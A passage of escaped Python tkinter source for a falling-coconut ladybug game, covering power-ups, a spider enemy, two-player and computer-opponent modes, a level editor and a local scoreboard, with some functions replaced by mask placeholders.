<=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\n<mask token>\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\n<mask token>\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef init(data):\n data.score = 0\n data.mode = 'splashScreen'\n data.timerDelay = 100\n data.height = 800\n data.width = 800\n data.speed = 10\n data.speedAI = 12\n data.speedAI2 = 12\n data.switchOnProgress = False\n data.r = 25\n data.cx = 280\n data.cy = 750\n data.onLeft1, data.onLeft2 = True, True\n data.win = False\n data.coconuts = []\n data.powerUps = []\n data.coconuts1 = []\n data.coconuts2 = []\n data.coconutsAI1 = []\n data.coconutsAI2 = []\n data.invincible = []\n data.pauseDrops = False\n data.pause1Drop = False\n data.pause2Drop = False\n init1(data)\n\n\n<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n 